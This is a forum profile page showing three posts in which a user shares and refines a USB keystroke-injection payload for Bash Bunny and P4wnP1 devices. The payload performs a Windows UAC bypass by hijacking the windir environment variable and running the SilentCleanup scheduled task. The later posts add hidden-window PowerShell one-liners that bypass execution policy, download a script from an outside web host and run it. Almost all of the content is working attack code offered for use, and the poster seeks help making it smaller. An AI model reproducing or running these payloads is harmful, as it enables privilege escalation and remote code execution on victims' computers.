Jump to content

KryptoKat

Members
  • Content Count

    3
  • Joined

  • Last visited

Posts posted by KryptoKat

  1. ---UPDATE---

    I finally got the PowerShell script functioning, in theory, this should work on any account because everyone has access to C:\Windows\Temp

    powershell -w h -ep bypass curl -OutFile 'C:\Windows\Temp\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt'; C:\Windows\Temp\uac.ps1

    Now to find something useful to do with this

  2. ---UPDATE---

    I've Simplified the script to

    powershell -w h curl -OutFile '%USERPROFILE%\uac.ps1' 'petrolic-designator.000webhostapp.com/uac.txt';

    However I'm having trouble running the file in the same line, any help would be greatly appreciated

  3. In theory, this bash bunny script should make a directory in C:\Windows called uac-bypassed I have no way to test this specific script because I don't have a bash bunny or a rubber ducky, so I had to make do with a P4wnP1 A.L.O.A. any help making this payload smaller would be greatly appreciated.
    (The command at the bottom is for the P4wnP1 A.L.O.A)

     

    Q GUI R
    Q powershell
    Q ENTER
    Q DELAY 500
    Q "echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"
    Q ENTER
    Q Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
    Q ENTER
    Q DELAY 500
    Q a
    Q .\\uac.ps1
    Q ENTER
    Q rmdir uac.ps1
    Q ENTER
    Q Set-ExecutionPolicy Undefined -Scope CurrentUser
    Q ENTER
    Q DELAY 500
    Q a
    Q ENTER
    Q exit
    Q ENTER
    P4wnP1_cli hid run -c 'layout("us"); typingSpeed(15,0); press("GUI R"); type("powershell"); press("ENTER"); delay(500); type(" echo \"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\")) { mkdir c:\\windows\\uac-bypassed } else { `$registryPath = `\"HKCU:\\Environment`\"; `$Name = `\"windir`\"; `$Value = `\"powershell -ep bypass -w h `$PSCommandPath;#`\"; Set-ItemProperty -Path `$registryPath -Name `$name -Value `$Value; schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null; Remove-ItemProperty -Path `$registryPath -Name `$name; }\" > uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type(".\\uac.ps1"); press("ENTER"); type("rmdir uac.ps1"); press("ENTER"); type("Set-ExecutionPolicy Undefined -Scope CurrentUser"); press("ENTER"); delay(500); type("a"); press("ENTER"); type("exit"); press("ENTER");'
    
×
×
  • Create New...